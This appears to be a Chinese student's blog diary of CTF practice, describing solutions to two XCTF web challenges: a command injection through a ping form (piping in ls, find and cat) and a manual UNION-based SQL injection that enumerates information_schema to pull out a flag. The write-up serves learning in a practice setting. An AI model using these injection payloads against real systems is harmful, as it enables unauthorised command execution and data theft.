寒假CTF打卡学习笔记~Day4

发布于 2020-01-18  929 次阅读


hhh之前几天因为要练车还有各种各样的事情耽搁了,虽然每天都还有坚持做题但是也就没有那么多时间来写博客打卡了(捂脸 不过后面会花时间把重要的知识点补写出来的

XCTF command_execution

点进去是一个Ping测试模块,根据题目漏洞猜测这个ping地址框里或许能做代码拼接,也就是说后台的代码可能是类似于 $command='ping'+$input 这种危险的形式,可能可以用|或者&&这类符号做命令拼接

尝试输入127.0.0.1 | ls

发现除了Ping还返回了index.php 说明猜测正确

于是陆续拼接find / -name "flag*"cat 找到的路径 即可获得flag

XCTF NewsCenter

搜索框内可注入,但是如果出现语法错误服务器直接返回500错误。。。

0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#

0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='secret_table'#

0' union select 1,2,fl4g from news.secret_table#

手工注入还是得清楚了解SQL语法,尤其是information_schema的结构,这题明明挺简单的但是我写了挺久。。不然天天用sqlmap跑还真就跑成了脚本小子(捂脸


等风来,不如追风去。